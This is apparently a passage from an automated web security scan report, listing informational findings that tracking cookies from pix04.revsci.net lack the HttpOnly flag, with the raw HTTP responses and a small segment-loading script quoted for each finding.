HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iHQaGKvNWNbdWFELSWX4cgfi8hl0kZCcw6ceuLt9P2NpiUf/MYlTYoG5t5eHvBNiLT+2/Xfw8sDm5o/dr/lyyqoyewPJyXyn2THfveLvEUUW1Bd8zRg/TVdUvxerT8QtDBYEHnka4DI4frtTQyQAIds+150VrGBN8g6cvpozUNuNqXY3MQ2j16ELBNs9WLdXNDp5Yk9JuCrco7FVu9BCTHbH9rdTRNtiXCHNBoTHfIEHfbB/8ByQ0arGQb+g8WX8PeyjYFloHg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:03:43 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:03:42 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.180. http://pix04.revsci.net/I10985/b3/0/3/1008211/31221949.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/31221949.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47ssdu65JwdoVl+MasTU0ubO+NOVEqMB5SuHqPlIcMQ/w6Se8zj4k4cE9YO7zjgPB7URf3kAfz+5iQ1zw3vuiM3r/TckuaflkljQAhmVSCSHb+JZkqdYPR9bqIQNe+1g/DwtERBSEZfzzKXV5RK/jWqBqeswgoo7pnibg6V7tJYgzNCqdbpw77QHRUtHFFnoVz91fCrKVSnd9KdSI3Z1WahAqH5m27RALV8jDVWT6L0Rjh6L5Voi28XVGkDrEZZW1tuA7/CBRQXV59cxlYxa59vJAQd6eHnGAQq5I6Dkt2R7yoqEmzD4LBH3ZS85QcgqYJ8zeOWeSZr47YcsFUA2OZFXqnmdsqPr1i8cw8b2X0/2QtJh4oBlsD6ALEYkKyqBeWepreKoVV7DsYHh4439ie74WprFUFjm2t0nNgDo+I3dP7E93Ox82wtO+gk5x6cxdWutYazkuEk5uTyaJbb2/JiEU9rR6Nw1VuCaDDvg1Udqpckrs+3gdo8X2mRce+f4M8WJ2UQMlHHuaxigcXc4y5OkRT6lytkrQCd+aGJaleRc92LE36wCDGV9m3G09myOHYUlqzwc7Zx06FXuvdUyXpNq8m7PF1sT21QexHLUkt/2IBTpDXjZUH2mRg/5Eo2FNNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:12:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47ssdu65JwdoVl+MasTU0ubO+NOVEqMB5SuHqPlIcMQ/w6Se8zj4k4cE9YO7zjgPB7URf3kAfz+5iQ1zw3vuiM3r/TckuaflkljQAhmVSCSHb+JZkqdYPR9bqIQNe+1g/DwtERBSEZfzzKXV5RK/jWqBqeswgoo7pnibg6V7tJYgzNCqdbpw77QHRUtHFFnoVz91fCrKVSnd9KdSI3Z1WahAqH5m27RALV8jDVWT6L0Rjh6L5Voi28XVGkDrEZZW1tuA7/CBRQXV59cxlYxa59vJAQd6eHnGAQq5I6Dkt2R7yoqEmzD4LBH3ZS85QcgqYJ8zeOWeSZr47YcsFUA2OZFXqnmdsqPr1i8cw8b2X0/2QtJh4oBlsD6ALEYkKyqBeWepreKoVV7DsYHh4439ie74WprFUFjm2t0nNgDo+I3dP7E93Ox82wtO+gk5x6cxdWutYazkuEk5uTyaJbb2/JiEU9rR6Nw1VuCaDDvg1Udqpckrs+3gdo8X2mRce+f4M8WJ2UQMlHHuaxigcXc4y5OkRT6lytkrQCd+aGJaleRc92LE36wCDGV9m3G09myOHYUlqzwc7Zx06FXuvdUyXpNq8m7PF1sT21QexHLUkt/2IBTpDXjZUH2mRg/5Eo2FNNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:12:50 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:12:50 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.181. http://pix04.revsci.net/I10985/b3/0/3/1008211/319879025.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/319879025.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBEq6kSbP3BW+WtxMJfXNIYt8JI870HCMovZvWZcKlAgNqH/8UCkWVUlX3IzKU4Rt4+5EdE6wRZEwMhtqkV8tVecrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9N+mZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+UShCE83doE5nPJB7rUvLssOKNIlrz9NOW8lII41Z0J/UMg+tZ6lcs2oKNN8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:52:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBEq6kSbP3BW+WtxMJfXNIYt8JI870HCMovZvWZcKlAgNqH/8UCkWVUlX3IzKU4Rt4+5EdE6wRZEwMhtqkV8tVecrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9N+mZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+UShCE83doE5nPJB7rUvLssOKNIlrz9NOW8lII41Z0J/UMg+tZ6lcs2oKNN8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:52:11 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:52:10 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.182. http://pix04.revsci.net/I10985/b3/0/3/1008211/321200067.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/321200067.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhTNumEx3FIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2GVl/GdrOMZ/Y+D7DfNeIzfEE3nvwziDXX9CzNUOZtt+UwJ4ENj88LMHK32+yHR2CfYwWmRtEdrfVZpwkrg+Sti3jYb16vkgNMv/DKSvNtqpQ3ouyotNJqnSwTH9pyof7RRAFyoe8qE/qSmTRbvNjMxkdYEeYuQcwicjtUZzfO2tWeeW9DbFUkE3KIrgqiGYornVEiz1OU84Rr4srcj33Q4Rz6lHqJMmuBS33n3/zpEOEBfycxar9lEB6PcW6WYJNfQr6xk587qz6i6ZqBG6s7it+ux+euNMethetarg55J1GgGpAz+A6YCKx77wOIpIiOv7fks8hSdzNpwUI1yOq8D840Is1Y4bGzaaV2HAzES7hMbIMbuVH6Uih8aDMyGfgcZP9qFLRSStfA5T2fzA038WznlvEGRiw/5mSy4Znt1LdQM07Z506FXv/3DdbxtEhIVP+TgW5oribh1MJ++eCSrdPtS48Sgum0nh1QxE//f0z; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:07:24 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhTNumEx3FIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2GVl/GdrOMZ/Y+D7DfNeIzfEE3nvwziDXX9CzNUOZtt+UwJ4ENj88LMHK32+yHR2CfYwWmRtEdrfVZpwkrg+Sti3jYb16vkgNMv/DKSvNtqpQ3ouyotNJqnSwTH9pyof7RRAFyoe8qE/qSmTRbvNjMxkdYEeYuQcwicjtUZzfO2tWeeW9DbFUkE3KIrgqiGYornVEiz1OU84Rr4srcj33Q4Rz6lHqJMmuBS33n3/zpEOEBfycxar9lEB6PcW6WYJNfQr6xk587qz6i6ZqBG6s7it+ux+euNMethetarg55J1GgGpAz+A6YCKx77wOIpIiOv7fks8hSdzNpwUI1yOq8D840Is1Y4bGzaaV2HAzES7hMbIMbuVH6Uih8aDMyGfgcZP9qFLRSStfA5T2fzA038WznlvEGRiw/5mSy4Znt1LdQM07Z506FXv/3DdbxtEhIVP+TgW5oribh1MJ++eCSrdPtS48Sgum0nh1QxE//f0z; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:07:24 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:07:23 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.183. http://pix04.revsci.net/I10985/b3/0/3/1008211/325815715.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/325815715.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhVhzYHWo07/vimX9eWOHz1Io60LZeoZK0fPDkiGU8HXulrRJtAG5InIPagRevfCEalQGjoIVztNEgbsNgBbQNwDt1/00FPGESYSukjOCdF1MH095+w6kmZgwek1xMiaLo478io+VkwjFp+NXLnMiX9F07sFEz+9pMTLi48TgR70M0yHEBiufdkDpoHw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:58:33 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhVhzYHWo07/vimX9eWOHz1Io60LZeoZK0fPDkiGU8HXulrRJtAG5InIPagRevfCEalQGjoIVztNEgbsNgBbQNwDt1/00FPGESYSukjOCdF1MH095+w6kmZgwek1xMiaLo478io+VkwjFp+NXLnMiX9F07sFEz+9pMTLi48TgR70M0yHEBiufdkDpoHw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:58:33 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:58:33 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.184. http://pix04.revsci.net/I10985/b3/0/3/1008211/329181290.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/329181290.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDw+Y00aHQ2YhnXE9qdN9E/C1TQIk5T/IxSnoCu7tbH3064NEubPeyggStoHw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:45:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDw+Y00aHQ2YhnXE9qdN9E/C1TQIk5T/IxSnoCu7tbH3064NEubPeyggStoHw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:45:02 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:45:02 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.185. http://pix04.revsci.net/I10985/b3/0/3/1008211/351391247.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/351391247.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNx6sMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpeqt1vpEp6PLPFjL00+eBCs6WjLf8zGKgiUktukxMj4LRehjtnrXATA7TZkMbfKjMiLMeNEEm/UfgxIQJtqpQYP/DuRMuCpad6JLNu5xR3q3Nz7Qafk8Wq0LRKXPXAPmKuDfSqNAA52IOTTmAVH8tD0S/YdoWswmaiEBbSz+MwOgD397VGeNFH/TE83MuTYCsr8SOCGmMmVMB6h97ZyxIjBb8MzzuEcOlvCO74c+w4v5CS/NhtPQjnhWFjRE2bGoLNZc0rW2//D6vang55J1GgLZQ6jMWccaEAMvC+smP1f1HkrEbSdzNqMIm1KKdwD840D4c7y3R4hj5u/GQ56eVSwG/SVRdfTdU7/8J9cyK4i587brnOIJfC42UX87URuVyUdQmf+VhpUrQ+FcB2ySMYhO2SOJ36YEeivt82Deapbp+4snD8JZgyt6tgd7D7qFfWLJUvk3U7uuprSNn4w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:15:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNx6sMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpeqt1vpEp6PLPFjL00+eBCs6WjLf8zGKgiUktukxMj4LRehjtnrXATA7TZkMbfKjMiLMeNEEm/UfgxIQJtqpQYP/DuRMuCpad6JLNu5xR3q3Nz7Qafk8Wq0LRKXPXAPmKuDfSqNAA52IOTTmAVH8tD0S/YdoWswmaiEBbSz+MwOgD397VGeNFH/TE83MuTYCsr8SOCGmMmVMB6h97ZyxIjBb8MzzuEcOlvCO74c+w4v5CS/NhtPQjnhWFjRE2bGoLNZc0rW2//D6vang55J1GgLZQ6jMWccaEAMvC+smP1f1HkrEbSdzNqMIm1KKdwD840D4c7y3R4hj5u/GQ56eVSwG/SVRdfTdU7/8J9cyK4i587brnOIJfC42UX87URuVyUdQmf+VhpUrQ+FcB2ySMYhO2SOJ36YEeivt82Deapbp+4snD8JZgyt6tgd7D7qFfWLJUvk3U7uuprSNn4w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:15:17 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:15:17 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.186. http://pix04.revsci.net/I10985/b3/0/3/1008211/35234473.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/35234473.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZPLlJc8T19VoEG91R/79+lt4fZilDrszXU7mdAMjFIkIYxMQCSNyifbqIhvmfRHQ/bfPEmoxjG9KsFrlIFpqF0DOsPBltx7T6Ls9mCUpsrdHAlqV622l96+o10Ip9jbnCOxhY2O+6BBt79v61ZquiPu+e8/TqC8ufzKjWyLX+CkGA7hBRd4KqxbK4GR3kr10P1alTxuIdxjE/vbgXj273xLQtFoAuMgvhXM+gRZosHNtdBlyI9PehcinFhTPHvJybV7PKGo2x/wdWBIATm7BeR5l66J4IED/xpidjbkw2u1kTEZnZn9WBtlgoahVnyL84qaA73tC4HvMP6AIXggyvgrmsWzt6IKQdWUHX7AMC8hesN6xhqUk6yK6Tj++FJJtKzuEVSP4KgLXeJZ+4qcJhmo3tTD2Dn1cvueINMs=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:13:18 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZPLlJc8T19VoEG91R/79+lt4fZilDrszXU7mdAMjFIkIYxMQCSNyifbqIhvmfRHQ/bfPEmoxjG9KsFrlIFpqF0DOsPBltx7T6Ls9mCUpsrdHAlqV622l96+o10Ip9jbnCOxhY2O+6BBt79v61ZquiPu+e8/TqC8ufzKjWyLX+CkGA7hBRd4KqxbK4GR3kr10P1alTxuIdxjE/vbgXj273xLQtFoAuMgvhXM+gRZosHNtdBlyI9PehcinFhTPHvJybV7PKGo2x/wdWBIATm7BeR5l66J4IED/xpidjbkw2u1kTEZnZn9WBtlgoahVnyL84qaA73tC4HvMP6AIXggyvgrmsWzt6IKQdWUHX7AMC8hesN6xhqUk6yK6Tj++FJJtKzuEVSP4KgLXeJZ